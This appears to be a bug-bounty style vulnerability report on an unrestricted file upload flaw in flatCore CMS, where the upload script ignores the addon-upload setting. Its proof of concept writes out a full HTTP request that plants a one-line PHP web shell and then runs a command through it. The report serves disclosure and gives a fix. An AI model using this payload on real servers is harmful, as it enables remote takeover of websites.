Unrestricted Upload of File with Dangerous Type in flatcore/flatcore-cms
Valid
Reported on
Oct 12th 2021
Description
Even with $fc_upload_addons = false, an attacker can still upload files by making the post request
Proof of Concept
- Enable $fc_upload_addons = true.
- Upload a PHP file, but do not send.
- Disable $fc_upload_addons = true.
- Send the file upload request. See that the file is still being uploaded to upload/plugins directory.
The following request uploads a malicious PHP script onto the server
POST /flatCore-CMS/acp/core/files.upload-script.php HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------167305252220314413616184565
Content-Length: 516
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/flatCore-CMS/acp/acp.php?tn=moduls&sub=u&plg=zipslip.zip
Cookie: acptheme=dark; PHPSESSID=6ffjvvcureq3dkrb4vco57bq6f
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="upload_type"
plugin
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="csrf_token"
acd4ba1989b9845c1de2364dcd3450cc
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: application/x-php
<?php
system($_GET["cmd"]);
?>
-----------------------------167305252220314413616184565--
5: Go to http://10.0.2.15/flatCore-CMS/upload/plugins/pwn.php?cmd=id to execute the malicious PHP script.
Impact
This vulnerability is capable of remote code execution with admin privileges
Recommended Fix
This occurs because files.upload-script.php does not check $fc_upload_addons is true before uploading.
